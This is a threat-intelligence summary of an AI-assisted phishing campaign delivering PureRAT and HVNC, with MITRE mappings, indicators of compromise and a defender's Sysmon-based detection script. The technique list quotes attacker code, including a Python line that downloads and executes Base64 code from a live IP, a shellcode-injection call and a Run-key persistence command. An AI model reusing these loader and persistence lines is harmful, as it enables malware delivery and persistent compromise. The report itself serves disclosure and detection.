PureRAT: Attacker Now Using AI to Build Toolset

A Vietnamese-linked threat actor is using AI-assisted code to run a widespread phishing campaign that lures victims with job-offer themed messages and delivers payloads including PureRAT and HVNC. The attacker uses ZIP/RAR archives or cloud-hosted downloads, DLL sideloading, and persistence mechanisms to maintain access and may be selling compromised access to other actors. #PureRAT #HVNC

Keypoints

  • The campaign begins with phishing emails masquerading as job offers, delivered either with malicious ZIP/RAR attachments or links to cloud-hosted archives (Dropbox).
  • Malicious archives contain an executable that sideloads a malicious DLL (examples: oledlg.dll, msimg32.dll, version.dll, profapi.dll) which then runs batch or Python loaders.
  • Multiple scripts and Python loaders show strong signs of AI assistance: extensive comments, numbered steps, debug messages, and even emojis in code comments.
  • Final payloads observed include PureRAT and various HVNC implants; payloads are fetched from hardcoded IPs, GitLab, and other web hosts.
  • Persistence is established via registry Run keys (masquerading as ChromeUpdate) and sometimes scheduled tasks; attackers also rename and restore user documents to avoid suspicion.
  • Attribution evidence points to a Vietnamese operator or handle (use of Vietnamese comments, @dev.vn in passwords, and handles like kimxhwan/hwanxkiem), and motivation appears criminal (selling access) rather than espionage.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Phishing emails deliver malicious ZIP/RAR attachments as job-offer lures (‘Attacks begin with phishing emails, usually masquerading as job offers.’).
  • [T1566.002] Spearphishing Link – Phishing emails contain links to cloud-hosted archives (Dropbox) that deliver the malicious archive (‘recent examples seen by Symantec were hosted on Dropbox, with the phishing emails likely containing links and instructions to download the file.’).
  • [T1105] Ingress Tool Transfer – Payloads and loaders are retrieved from remote hosts: hardcoded IPs, GitLab and other web locations (‘payload was downloaded from a hardcoded IP address, in others it was downloaded from Gitlab’).
  • [T1574] Hijack Execution Flow (DLL side-loading) – Malicious DLLs are sideloaded by legitimate or renamed executables (Haihaisoft PDF Reader, an old version of Microsoft Excel, a renamed Foxit binary) to run malicious code (‘the executable used for sideloading was the Haihaisoft PDF Reader or an old version of Microsoft Excel’).
  • [T1055] Process Injection – Loaders call Windows APIs to allocate memory, write shellcode and create a remote thread in a suspended process (InstallUtil.exe) to run the payload (‘CreateRemoteThread(process_info.hProcess, None, 0, addr, None, 0, None)’).
  • [T1218.011] Signed Binary Proxy Execution (InstallUtil.exe) – The Python loader creates a suspended InstallUtil.exe process and runs injected shellcode inside it (‘target_path = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" … Created suspended process PID’).
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence is achieved by adding an entry to the current user's Run key, masquerading as ChromeUpdate (‘reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" … masquerading as ChromeUpdate’).
  • [T1053] Scheduled Task/Job – In some cases a scheduled task with a benign-looking name (e.g., 123456.exe) is created to maintain persistence (‘In some cases, a scheduled task is created, with various names, such as 123456.exe.’).
  • [T1059.003] Command and Scripting Interpreter (Windows Command Shell) – Batch scripts create hidden directories, rename files, extract archives with 7z and launch payloads (‘@echo off … ren "document.pdf" "huna.zip"’).
  • [T1059.006] Command and Scripting Interpreter (Python) – Python loaders fetch Base64-encoded shellcode, decode it and make Windows API calls to inject and execute the payload (‘import requests,base64;exec(base64.b64decode(requests.get('http://196.251.86.145/huna2').text))’ and ‘shellcode_b64 = "BASE64SHELLCODE (too large to be put here)"’).
  • [T1027] Obfuscated Files or Information – Payloads are transferred as Base64-encoded code that is fetched and decoded at runtime (‘fetches Base64 encoded code for the payload from the following URL: http://196.251.86[.]145/huna2’).
  • [T1036] Masquerading – Files and executables are renamed to appear benign (document.pdf/document.docx) and executables are given names like AdobeReader.exe to avoid detection (‘it then takes locally saved, innocuously named document.pdf and document.docx files and renames them to huna.zip and huna.exe’).

Indicators of Compromise

  • [File Hashes] Malicious scripts and payloads – 06ad3e407d5370648350e64e11278fc974197ae26fa02457c5dea645d3936bc1 (batch script), 12a7f1aec5303e3e2eee59d9616b7e440f9c877d0db76620e8768c85433f3762 (sideloaded DLL), and 100+ other hashes listed in the report.
  • [IP Addresses] Command-and-control / payload hosting – 196.251.86[.]145, 139.99.17[.]175, and 8 other IPs observed serving payloads or loaders.
  • [Domains / URLs] Hosting and distribution points (cloud and web hosts) – https://dl.dropboxusercontent[.]com/… (multiple Dropbox-hosted archives), https://gitlab[.]com/kimxhwan/kimxhwan/-/raw/main/kimxhwan (GitLab raw payload), and many other URLs (Dropbox, GitLab, ginten555333[.]com, dmca-wipo[.]com, etc.).
  • [File Names] Malicious archives and executables used as lures and sideloaders – New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zip, Duolingo_Marketing_Skills_Assessment_oct.exe, adobereader.exe and huna.exe (renamed 7zip/WinRAR), and multiple other archive/executable names.
  • [DLL Names] Sideloaded loader DLLs – oledlg.dll, msimg32.dll (used as sideloaded DLLs), and several other DLLs observed in sideloading chains.
  • [Registry / Persistence] Startup persistence indicators – HKCU\Software\Microsoft\Windows\CurrentVersion\Run value ‘ChromeUpdate’ used to auto-run the Python interpreter (zvchost.exe), and scheduled task names such as ‘123456.exe’.
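A defender-side check built from the sideloading technique (T1574) and the Run-key persistence indicator above, added here as an example that is not code from the Symantec report or the attacker's toolset. It scans Sysmon-style JSON events (field names ImageLoaded, TargetObject and Details follow Sysmon; the log lines themselves are constructed) for the named DLLs loading from outside the Windows system directories and for a Run value named ChromeUpdate.

```python
import json
import ntpath

# DLL names the report lists as sideloaded; all paths are compared lower-cased.
SIDELOAD_DLLS = {"oledlg.dll", "msimg32.dll", "version.dll", "profapi.dll"}
# A load of one of those DLLs from these locations is the normal, legitimate case.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


def check_event(ev):
    """Return a finding string for one Sysmon-style event dict, or None if benign."""
    eid = ev.get("EventID")
    if eid == 7:  # Sysmon image load: a process loaded a DLL
        loaded = ev["ImageLoaded"].lower()
        if ntpath.basename(loaded) in SIDELOAD_DLLS and not loaded.startswith(SYSTEM_DIRS):
            return f"possible DLL sideload: {ev['Image']} loaded {ev['ImageLoaded']}"
    elif eid == 13:  # Sysmon registry value set
        target = ev["TargetObject"].lower()
        if RUN_KEY in target and target.endswith("\\chromeupdate"):
            return f"Run-key persistence as ChromeUpdate: {ev['Details']}"
    return None


def scan(lines):
    """Run check_event over newline-delimited JSON events; return the findings in order."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            finding = check_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample events: one sideload from a Downloads folder, one legitimate
# load of version.dll from System32, one ChromeUpdate Run value, one benign Run value.
SAMPLE_LOG = r'''
{"EventID": 7, "Image": "C:\\Users\\bob\\Downloads\\job_offer\\HaihaisoftPDFReader.exe", "ImageLoaded": "C:\\Users\\bob\\Downloads\\job_offer\\oledlg.dll"}
{"EventID": 7, "Image": "C:\\Program Files\\Example\\app.exe", "ImageLoaded": "C:\\Windows\\System32\\version.dll"}
{"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ChromeUpdate", "Details": "C:\\Users\\bob\\AppData\\Local\\svc\\zvchost.exe loader.py"}
{"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "Details": "C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"}
'''

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

The sideload rule will also flag legitimate applications that ship their own copy of one of these DLLs next to the executable, so tune SYSTEM_DIRS or add an allow-list per application before running it at scale.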


Read more: https://www.security.com/threat-intelligence/ai-purerat-phishing